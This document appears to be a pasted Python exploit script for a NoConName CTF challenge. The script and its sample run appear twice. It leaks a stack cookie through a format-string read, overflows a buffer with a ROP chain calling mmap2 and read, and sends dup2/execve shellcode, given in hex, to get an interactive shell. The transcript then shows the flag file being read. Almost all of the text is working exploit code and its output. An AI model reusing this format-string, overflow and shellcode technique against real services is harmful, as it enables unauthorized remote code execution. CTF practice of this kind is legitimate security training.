g05u · August 29, 2015 14:06
diff --git a/ncn_explicit_exploit.py b/ncn_explicit_exploit.py
 #!/usr/bin/env python
 import struct, sys, time
 from nulllife import *

 #
 #NoConName CTF 
 #explitcit exploit 500pts
 #
 s = NullSocket("88.87.208.163", 7070)

 print s.readuntil("20: ")
 s.writeline("%70$08X")
 s.readuntil("is ")
 #cookie = 0xC0951F00
 cookie = int(s.read(8), 16)
 s.readuntil("20: ")

 padding_cookie = 0x100
 padding_ret = 0x110
 fd = 4

 sys_write = 0x0805EFAA
 sys_read  = 0x0805EF4A
 sys_mmap2 = 0x0805F960
 exec_addr = 0x43440000
 pop_7_ret = 0x080494d7 #add esp 0x1C; retn

 shellcode = NullShell("dup2").get(fd) + NullShell("exec").get()

 print "Shellcode: " + shellcode.encode('hex')
 shellcode = "\x90" * 16 + shellcode

 payload = "q"	#finish loop
 payload += "A" * (padding_cookie - len(payload))
 payload += pack(cookie)
 payload += "B" * (padding_ret - len(payload)) 

 #call mmap2
 payload += pack(sys_mmap2)
 payload += pack(pop_7_ret)
 payload += pack(exec_addr)  #address
 payload += pack(0x00010000) #size
 payload += pack(7) #permisos
 payload += pack(0x32) #permisos
 payload += pack(0xFFFFFFFF) #
 payload += pack(0)
 payload += "D" * 4

 #call fread
 payload += pack(sys_read)
 payload += pack(exec_addr) #return to shellcode
 payload += pack(fd) #fd
 payload += pack(exec_addr)
 payload += pack(len(shellcode))
 print hex(len(shellcode))
 print "[!] Send payload"
 s.writeline(payload)
 time.sleep(1)
 print "[!] Send shellcode"
 s.write(shellcode)
 print "[*] Got shell..."
 s.interactive()
 '''
 $ python explicit.py
 Welcome to Guess The Number Online!

 Pick a number between 0 and 20:
 Shellcode: 31db31c9b304b1036a3f5849cd8075f831c050682f2f7368682f62696e89e3505389e189c2b00bcd80
 [!] Send payload
 [!] Send shellcode
 [*] Got shell...
 Bye
 id
 uid=1006(ch5) gid=1006(ch5) groups=1006(ch5)
 ls -la
 total 88
 drwxr-xr-x 22 root root 4096 Sep 13 17:48 .
 drwxr-xr-x 22 root root 4096 Sep 13 17:48 ..
 drwxr-xr-x  2 root root 4096 Sep 12 17:57 bin
 drwxr-xr-x  2 root root 4096 Jun 11 23:07 boot
 drwxr-xr-x  3 root root 4096 Sep 12 17:40 dev
 drwxr-xr-x 51 root root 4096 Sep 13 19:58 etc
 drwxr-xr-x  3 root root 4096 Sep 13 18:34 home
 drwxr-xr-x 11 root root 4096 Sep 12 17:40 lib
 drwxr-xr-x  2 root root 4096 Sep 12 17:51 lib64
 drwxr-xr-x  2 root root 4096 Sep 12 17:38 media
 drwxr-xr-x  2 root root 4096 Jun 11 23:07 mnt
 drwxr-xr-x  2 root root 4096 Sep 12 17:38 opt
 drwxr-xr-x  2 root root 4096 Jun 11 23:07 proc
 drwx------  2 root root 4096 Sep 13 18:41 root
 drwxr-xr-x  6 root root 4096 Sep 13 18:30 run
 drwxr-xr-x  2 root root 4096 Sep 12 17:51 sbin
 drwxr-xr-x  2 root root 4096 Jun 10  2012 selinux
 drwxr-xr-x  2 root root 4096 Sep 12 17:38 srv
 drwxr-xr-x  2 root root 4096 Jul 14  2013 sys
 drwxrwxrwt  3 root root 4096 Sep 14 03:01 tmp
 drwxr-xr-x 10 root root 4096 Sep 12 17:38 usr
 drwxr-xr-x 12 root root 4096 Sep 12 17:57 var
 cd /home
 ls
 ch5
 cd ch5
 ls -la
 total 600
 drwxr-xr-x 2 ch5  ch5    4096 Sep 14 02:50 .
 drwxr-xr-x 3 root root   4096 Sep 13 18:34 ..
 -rw------- 1 ch5  ch5     337 Sep 14 02:50 .bash_history
 -rw-r--r-- 1 ch5  ch5     220 Dec 30  2012 .bash_logout
 -rw-r--r-- 1 ch5  ch5    3392 Dec 30  2012 .bashrc
 -rw-r--r-- 1 ch5  ch5     675 Dec 30  2012 .profile
 -rwxr-xr-x 1 root root 583172 Sep 13 19:58 explicit
 -rw-r--r-- 1 root root     45 Sep 14 01:31 flag.txt
 -rw------- 1 ch5  ch5       0 Sep 13 21:31 nohup.out
 cat flag.txt
 NcN_97740ead1060892a253be8ca33c6364a712b21d2
 exit
 *** Connection closed by remote host ***

 '''
	#!/usr/bin/env python
	import struct, sys, time
	from nulllife import *

	#
	#NoConName CTF
	#explitcit exploit 500pts
	#
	s = NullSocket("88.87.208.163", 7070)

	print s.readuntil("20: ")
	s.writeline("%70$08X")
	s.readuntil("is ")
	#cookie = 0xC0951F00
	cookie = int(s.read(8), 16)
	s.readuntil("20: ")

	padding_cookie = 0x100
	padding_ret = 0x110
	fd = 4

	sys_write = 0x0805EFAA
	sys_read = 0x0805EF4A
	sys_mmap2 = 0x0805F960
	exec_addr = 0x43440000
	pop_7_ret = 0x080494d7 #add esp 0x1C; retn

	shellcode = NullShell("dup2").get(fd) + NullShell("exec").get()

	print "Shellcode: " + shellcode.encode('hex')
	shellcode = "\x90" * 16 + shellcode

	payload = "q" #finish loop
	payload += "A" * (padding_cookie - len(payload))
	payload += pack(cookie)
	payload += "B" * (padding_ret - len(payload))

	#call mmap2
	payload += pack(sys_mmap2)
	payload += pack(pop_7_ret)
	payload += pack(exec_addr) #address
	payload += pack(0x00010000) #size
	payload += pack(7) #permisos
	payload += pack(0x32) #permisos
	payload += pack(0xFFFFFFFF) #
	payload += pack(0)
	payload += "D" * 4

	#call fread
	payload += pack(sys_read)
	payload += pack(exec_addr) #return to shellcode
	payload += pack(fd) #fd
	payload += pack(exec_addr)
	payload += pack(len(shellcode))
	print hex(len(shellcode))
	print "[!] Send payload"
	s.writeline(payload)
	time.sleep(1)
	print "[!] Send shellcode"
	s.write(shellcode)
	print "[*] Got shell..."
	s.interactive()
	'''
	$ python explicit.py
	Welcome to Guess The Number Online!

	Pick a number between 0 and 20:
	Shellcode: 31db31c9b304b1036a3f5849cd8075f831c050682f2f7368682f62696e89e3505389e189c2b00bcd80
	[!] Send payload
	[!] Send shellcode
	[*] Got shell...
	Bye
	id
	uid=1006(ch5) gid=1006(ch5) groups=1006(ch5)
	ls -la
	total 88
	drwxr-xr-x 22 root root 4096 Sep 13 17:48 .
	drwxr-xr-x 22 root root 4096 Sep 13 17:48 ..
	drwxr-xr-x 2 root root 4096 Sep 12 17:57 bin
	drwxr-xr-x 2 root root 4096 Jun 11 23:07 boot
	drwxr-xr-x 3 root root 4096 Sep 12 17:40 dev
	drwxr-xr-x 51 root root 4096 Sep 13 19:58 etc
	drwxr-xr-x 3 root root 4096 Sep 13 18:34 home
	drwxr-xr-x 11 root root 4096 Sep 12 17:40 lib
	drwxr-xr-x 2 root root 4096 Sep 12 17:51 lib64
	drwxr-xr-x 2 root root 4096 Sep 12 17:38 media
	drwxr-xr-x 2 root root 4096 Jun 11 23:07 mnt
	drwxr-xr-x 2 root root 4096 Sep 12 17:38 opt
	drwxr-xr-x 2 root root 4096 Jun 11 23:07 proc
	drwx------ 2 root root 4096 Sep 13 18:41 root
	drwxr-xr-x 6 root root 4096 Sep 13 18:30 run
	drwxr-xr-x 2 root root 4096 Sep 12 17:51 sbin
	drwxr-xr-x 2 root root 4096 Jun 10 2012 selinux
	drwxr-xr-x 2 root root 4096 Sep 12 17:38 srv
	drwxr-xr-x 2 root root 4096 Jul 14 2013 sys
	drwxrwxrwt 3 root root 4096 Sep 14 03:01 tmp
	drwxr-xr-x 10 root root 4096 Sep 12 17:38 usr
	drwxr-xr-x 12 root root 4096 Sep 12 17:57 var
	cd /home
	ls
	ch5
	cd ch5
	ls -la
	total 600
	drwxr-xr-x 2 ch5 ch5 4096 Sep 14 02:50 .
	drwxr-xr-x 3 root root 4096 Sep 13 18:34 ..
	-rw------- 1 ch5 ch5 337 Sep 14 02:50 .bash_history
	-rw-r--r-- 1 ch5 ch5 220 Dec 30 2012 .bash_logout
	-rw-r--r-- 1 ch5 ch5 3392 Dec 30 2012 .bashrc
	-rw-r--r-- 1 ch5 ch5 675 Dec 30 2012 .profile
	-rwxr-xr-x 1 root root 583172 Sep 13 19:58 explicit
	-rw-r--r-- 1 root root 45 Sep 14 01:31 flag.txt
	-rw------- 1 ch5 ch5 0 Sep 13 21:31 nohup.out
	cat flag.txt
	NcN_97740ead1060892a253be8ca33c6364a712b21d2
	exit
	* Connection closed by remote host *

	'''